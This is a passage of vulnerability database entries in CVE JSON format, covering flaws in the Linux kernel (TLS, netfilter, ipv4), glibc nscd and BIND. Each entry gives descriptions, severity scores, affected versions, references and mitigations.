(one which called recvmsg/sendmsg)\nmay exit as soon as the async crypto handler calls complete()\nso any code past that point risks touching already freed data.\n\nTry to avoid the locking and extra flags altogether.\nHave the main thread hold an extra reference, this way\nwe can depend solely on the atomic ref counter for\nsynchronization.\n\nDon\u0027t futz with reiniting the completion, either, we are now\ntightly controlling when completion fires." } ], "providerMetadata": { "dateUpdated": "2024-12-19T08:42:56.872Z", "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "shortName": "Linux" }, "references": [ { "url": "https://git.kernel.org/stable/c/f17d21ea73918ace8afb9c2d8e734dbf71c2c9d7" }, { "url": "https://git.kernel.org/stable/c/7a3ca06d04d589deec81f56229a9a9d62352ce01" }, { "url": "https://git.kernel.org/stable/c/86dc27ee36f558fe223dbdfbfcb6856247356f4a" }, { "url": "https://git.kernel.org/stable/c/6209319b2efdd8524691187ee99c40637558fa33" }, { "url": "https://git.kernel.org/stable/c/aec7961916f3f9e88766e2688992da6980f11b8d" } ], "title": "tls: fix race between async notify and socket close", "x_generator": { "engine": "bippy-5f407fcff5a0" } } }, "cveMetadata": { "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "assignerShortName": "Linux", "cveId": "CVE-2024-26583", "datePublished": "2024-02-21T14:59:11.845Z", "dateReserved": "2024-02-19T14:20:24.125Z", "dateUpdated": "2024-12-19T08:42:56.872Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-39193
Vulnerability from cvelistv5
Published
2023-10-09 17:57
Modified
2024-11-15 17:03
Severity ?
EPSS score ?
Summary
A flaw was found in the Netfilter subsystem in the Linux kernel. The sctp_mt_check did not validate the flag_count field. This flaw allows a local privileged (CAP_NET_ADMIN) attacker to trigger an out-of-bounds read, leading to a crash or information disclosure.
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:2394 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2950 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:3138 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2023-39193 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2226787 | issue-tracking, x_refsource_REDHAT | |
https://www.zerodayinitiative.com/advisories/ZDI-CAN-18866/ |
Impacted products
Vendor | Product | Version | |||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ | Red Hat | Red Hat Enterprise Linux 8 |
Unaffected: 0:4.18.0-553.rt7.342.el8_10 < * cpe:/a:redhat:enterprise_linux:8::realtime cpe:/a:redhat:enterprise_linux:8::nfv |
||||||||||||||||||||||||||||
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T18:02:06.556Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "name": "RHSA-2024:2950", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2950" }, { "name": "RHSA-2024:3138", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:3138" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-39193" }, { "name": "RHBZ#2226787", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2226787" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" }, { "tags": [ "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-CAN-18866/" } ], "title": "CVE Program Container" }, { "metrics": [ { "other": { "content": { "id": "CVE-2023-39193", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-08-29T19:59:34.680575Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-08-29T20:00:52.526Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::realtime", "cpe:/a:redhat:enterprise_linux:8::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-553.rt7.342.el8_10", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8::baseos", "cpe:/a:redhat:enterprise_linux:8::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-553.el8_10", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unknown", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" } ], "datePublic": "2023-09-29T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A flaw was found in the Netfilter subsystem in the Linux kernel. The sctp_mt_check did not validate the flag_count field. This flaw allows a local privileged (CAP_NET_ADMIN) attacker to trigger an out-of-bounds read, leading to a crash or information disclosure." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-125", "description": "Out-of-bounds Read", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-15T17:03:40.994Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "name": "RHSA-2024:2950", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2950" }, { "name": "RHSA-2024:3138", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:3138" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-39193" }, { "name": "RHBZ#2226787", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2226787" }, { "url": "https://www.zerodayinitiative.com/advisories/ZDI-CAN-18866/" } ], "timeline": [ { "lang": "en", "time": "2023-07-25T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-09-29T00:00:00+00:00", "value": "Made public." } ], "title": "Kernel: netfilter: xtables sctp out-of-bounds read in match_flags()", "workarounds": [ { "lang": "en", "value": "This flaw can be mitigated by preventing the affected `xt_sctp` kernel module from being loaded. For instructions on how to blacklist a kernel module, please see https://access.redhat.com/solutions/41278." } ], "x_redhatCweChain": "CWE-125: Out-of-bounds Read" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-39193", "datePublished": "2023-10-09T17:57:49.676Z", "dateReserved": "2023-07-25T16:01:14.836Z", "dateUpdated": "2024-11-15T17:03:40.994Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-33600
Vulnerability from cvelistv5
Published
2024-05-06 19:22
Modified
2024-08-02 02:36
Severity ?
EPSS score ?
Summary
nscd: Null pointer crashes after notfound response
If the Name Service Cache Daemon's (nscd) cache fails to add a not-found
netgroup response to the cache, the client request can result in a null
pointer dereference. This flaw was introduced in glibc 2.15 when the
cache was added to nscd.
This vulnerability is only present in the nscd binary.
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | The GNU C Library | glibc |
Version: 2.15 < 2.40 |
|
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2024-33600", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-05-07T19:13:16.760599Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-06-04T17:44:18.891Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T02:36:04.168Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://sourceware.org/git/?p=glibc.git;a=blob;f=advisories/GLIBC-SA-2024-0006" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240524-0013/" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00026.html" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/07/22/5" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "glibc", "vendor": "The GNU C Library", "versions": [ { "lessThan": "2.40", "status": "affected", "version": "2.15", "versionType": "custom" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "\u003cdiv\u003enscd: Null pointer crashes after notfound response\u003cbr\u003e\u003cbr\u003eIf the Name Service Cache Daemon\u0027s (nscd) cache fails to add a not-found\u003cbr\u003enetgroup response to the cache, the client request can result in a null\u003cbr\u003epointer dereference. This flaw was introduced in glibc 2.15 when the\u003cbr\u003ecache was added to nscd.\u003cbr\u003e\u003cbr\u003eThis vulnerability is only present in the nscd binary.\u003cbr\u003e\u003c/div\u003e" } ], "value": "nscd: Null pointer crashes after notfound response\n\nIf the Name Service Cache Daemon\u0027s (nscd) cache fails to add a not-found\nnetgroup response to the cache, the client request can result in a null\npointer dereference. This flaw was introduced in glibc 2.15 when the\ncache was added to nscd.\n\nThis vulnerability is only present in the nscd binary.\n\n" } ], "impacts": [ { "capecId": "CAPEC-129", "descriptions": [ { "lang": "en", "value": "CAPEC-129 Pointer Manipulation" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-476", "description": "CWE-476 NULL Pointer Dereference", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-05-06T19:22:02.726Z", "orgId": "3ff69d7a-14f2-4f67-a097-88dee7810d18", "shortName": "glibc" }, "references": [ { "url": "https://sourceware.org/git/?p=glibc.git;a=blob;f=advisories/GLIBC-SA-2024-0006" }, { "url": "https://security.netapp.com/advisory/ntap-20240524-0013/" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00026.html" }, { "url": "http://www.openwall.com/lists/oss-security/2024/07/22/5" } ], "source": { "discovery": "UNKNOWN" }, "title": "nscd: Null pointer crashes after notfound response", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "3ff69d7a-14f2-4f67-a097-88dee7810d18", "assignerShortName": "glibc", "cveId": "CVE-2024-33600", "datePublished": "2024-05-06T19:22:02.726Z", "dateReserved": "2024-04-24T20:35:08.340Z", "dateUpdated": "2024-08-02T02:36:04.168Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-25220
Vulnerability from cvelistv5
Published
2022-03-23 12:50
Modified
2024-09-16 17:08
Severity ?
EPSS score ?
Summary
BIND 9.11.0 -> 9.11.36 9.12.0 -> 9.16.26 9.17.0 -> 9.18.0 BIND Supported Preview Editions: 9.11.4-S1 -> 9.11.36-S1 9.16.8-S1 -> 9.16.26-S1 Versions of BIND 9 earlier than those shown - back to 9.1.0, including Supported Preview Editions - are also believed to be affected but have not been tested as they are EOL. The cache could become poisoned with incorrect records leading to queries being made to the wrong servers, which might also result in false information being returned to clients.
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | ISC | BIND |
Version: Open Source Branch 9.11 9.11.0 through versions before 9.11.37 Version: Development Branch 9.17 BIND 9.17 all version Version: Open Source Branch 9.12-16 9.12.0 through versions before 9.16.27 Version: Open Source Branch 9.18 9.18.0 Version: Supported Preview Branch 9.11-S 9.11.0-S through versions before 9.11.37-S Version: Supported Preview Branch 9.16-S 9.16.0-S through versions before 9.16.27-S |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T19:56:11.083Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://kb.isc.org/v1/docs/cve-2021-25220" }, { "name": "FEDORA-2022-14e36aac0c", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NYD7US4HZRFUGAJ66ZTHFBYVP5N3OQBY/" }, { "name": "FEDORA-2022-042d9c6146", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/API7U5E7SX7BAAVFNW366FFJGD6NZZKV/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20220408-0001/" }, { "name": "FEDORA-2022-a88218de5c", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5VX3I2U3ICOIEI5Y7OYA6CHOLFMNH3YQ/" }, { "name": "FEDORA-2022-05918f0838", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2SXT7247QTKNBQ67MNRGZD23ADXU6E5U/" }, { "name": "FEDORA-2022-3f293290c3", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DE3UAVCPUMAKG27ZL5YXSP2C3RIOW3JZ/" }, { "tags": [ "x_transferred" ], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf" }, { "name": "GLSA-202210-25", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://security.gentoo.org/glsa/202210-25" }, { "tags": [ "x_transferred" ], "url": "https://supportportal.juniper.net/s/article/2022-10-Security-Bulletin-Junos-OS-SRX-Series-Cache-poisoning-vulnerability-in-BIND-used-by-DNS-Proxy-CVE-2021-25220?language=en_US" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "BIND", "vendor": "ISC", "versions": [ { "status": "affected", "version": "Open Source Branch 9.11 9.11.0 through versions before 9.11.37" }, { "status": "affected", "version": "Development Branch 9.17 BIND 9.17 all version" }, { "status": "affected", "version": "Open Source Branch 9.12-16 9.12.0 through versions before 9.16.27" }, { "status": "affected", "version": "Open Source Branch 9.18 9.18.0" }, { "status": "affected", "version": "Supported Preview Branch 9.11-S 9.11.0-S through versions before 9.11.37-S" }, { "status": "affected", "version": "Supported Preview Branch 9.16-S 9.16.0-S through versions before 9.16.27-S" } ] } ], "credits": [ { "lang": "en", "value": "ISC would like to thank Xiang Li, Baojun Liu, and Chaoyi Lu from Network and Information Security Lab, Tsinghua University and Changgen Zou from Qi An Xin Group Corp. for discovering and reporting this issue." } ], "datePublic": "2022-03-16T00:00:00", "descriptions": [ { "lang": "en", "value": "BIND 9.11.0 -\u003e 9.11.36 9.12.0 -\u003e 9.16.26 9.17.0 -\u003e 9.18.0 BIND Supported Preview Editions: 9.11.4-S1 -\u003e 9.11.36-S1 9.16.8-S1 -\u003e 9.16.26-S1 Versions of BIND 9 earlier than those shown - back to 9.1.0, including Supported Preview Editions - are also believed to be affected but have not been tested as they are EOL. The cache could become poisoned with incorrect records leading to queries being made to the wrong servers, which might also result in false information being returned to clients." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:N", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "description": "When using forwarders, bogus NS records supplied by, or via, those forwarders may be cached and used by named if it needs to recurse for any reason, causing it to obtain and pass on potentially incorrect answers. Some examples of configurations that will be vulnerable are: Resolvers using per zone or global forwarding with forward first (forward first is the default). Resolvers not using global forwarding, but with per-zone forwarding with either forward first (the default) or forward only. Resolvers configured with global forwarding along with zone statements that disable forwarding for part of the DNS namespace. Authoritative-only BIND 9 servers are not vulnerable to this flaw. BIND 9.11.0 -\u003e 9.11.36 9.12.0 -\u003e 9.16.26 9.17.0 -\u003e 9.18.0 BIND Supported Preview Editions: 9.11.4-S1 -\u003e 9.11.36-S1 9.16.8-S1 -\u003e 9.16.26-S1 Versions of BIND 9 earlier than those shown - back to 9.1.0, including Supported Preview Editions - are also believed to be affected but have not been tested as they are EOL.", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-07-23T00:00:00", "orgId": "404fd4d2-a609-4245-b543-2c944a302a22", "shortName": "isc" }, "references": [ { "url": "https://kb.isc.org/v1/docs/cve-2021-25220" }, { "name": "FEDORA-2022-14e36aac0c", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NYD7US4HZRFUGAJ66ZTHFBYVP5N3OQBY/" }, { "name": "FEDORA-2022-042d9c6146", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/API7U5E7SX7BAAVFNW366FFJGD6NZZKV/" }, { "url": "https://security.netapp.com/advisory/ntap-20220408-0001/" }, { "name": "FEDORA-2022-a88218de5c", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5VX3I2U3ICOIEI5Y7OYA6CHOLFMNH3YQ/" }, { "name": "FEDORA-2022-05918f0838", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2SXT7247QTKNBQ67MNRGZD23ADXU6E5U/" }, { "name": "FEDORA-2022-3f293290c3", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DE3UAVCPUMAKG27ZL5YXSP2C3RIOW3JZ/" }, { "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf" }, { "name": "GLSA-202210-25", "tags": [ "vendor-advisory" ], "url": "https://security.gentoo.org/glsa/202210-25" }, { "url": "https://supportportal.juniper.net/s/article/2022-10-Security-Bulletin-Junos-OS-SRX-Series-Cache-poisoning-vulnerability-in-BIND-used-by-DNS-Proxy-CVE-2021-25220?language=en_US" } ], "solutions": [ { "lang": "en", "value": "Upgrade to the patched release most closely related to your current version of BIND:\n BIND 9.11.37\n BIND 9.16.27\n BIND 9.18.1\nBIND Supported Preview Edition is a special feature preview branch of BIND provided to eligible ISC support customers.\n BIND 9.11.37-S1\n BIND 9.16.27-S1" } ], "source": { "discovery": "EXTERNAL" }, "title": "DNS forwarders - cache poisoning vulnerability", "workarounds": [ { "lang": "en", "value": "If applicable, modify your configuration to either remove all forwarding or all possibility of recursion. Depending on your use-case, it may be possible to use other zone types to replace forward zones.\nActive exploits: We are not aware of any active exploits." } ], "x_generator": { "engine": "Vulnogram 0.0.9" } } }, "cveMetadata": { "assignerOrgId": "404fd4d2-a609-4245-b543-2c944a302a22", "assignerShortName": "isc", "cveId": "CVE-2021-25220", "datePublished": "2022-03-23T12:50:10.367480Z", "dateReserved": "2021-01-15T00:00:00", "dateUpdated": "2024-09-16T17:08:54.143Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-42754
Vulnerability from cvelistv5
Published
2023-10-05 18:25
Modified
2024-11-15 17:05
Severity ?
EPSS score ?
Summary
A NULL pointer dereference flaw was found in the Linux kernel ipv4 stack. The socket buffer (skb) was assumed to be associated with a device before calling __ip_options_compile, which is not always the case if the skb is re-routed by ipvs. This issue may allow a local user with CAP_NET_ADMIN privileges to crash the system.
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:2394 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2950 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:3138 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2023-42754 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2239845 | issue-tracking, x_refsource_REDHAT | |
https://seclists.org/oss-sec/2023/q4/14 |
Impacted products
Vendor | Product | Version | |||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ | Red Hat | Red Hat Enterprise Linux 8 |
Unaffected: 0:4.18.0-553.rt7.342.el8_10 < * cpe:/a:redhat:enterprise_linux:8::nfv cpe:/a:redhat:enterprise_linux:8::realtime |
||||||||||||||||||||||||||||
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T19:30:24.420Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "name": "RHSA-2024:2950", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2950" }, { "name": "RHSA-2024:3138", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:3138" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-42754" }, { "name": "RHBZ#2239845", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2239845" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GISYSL3F6WIEVGHJGLC2MFNTUXHPTKQH/" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GPMICQ2HVZO5UAM5KPXHAZKA2U3ZDOO6/" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5PDNWPKAP3WL5RQZ4RIDS6MG32OHH5R/" }, { "tags": [ "x_transferred" ], "url": "https://seclists.org/oss-sec/2023/q4/14" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::nfv", "cpe:/a:redhat:enterprise_linux:8::realtime" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-553.rt7.342.el8_10", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::crb", "cpe:/o:redhat:enterprise_linux:8::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-553.el8_10", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" } ], "datePublic": "2023-09-17T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A NULL pointer dereference flaw was found in the Linux kernel ipv4 stack. The socket buffer (skb) was assumed to be associated with a device before calling __ip_options_compile, which is not always the case if the skb is re-routed by ipvs. This issue may allow a local user with CAP_NET_ADMIN privileges to crash the system." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": 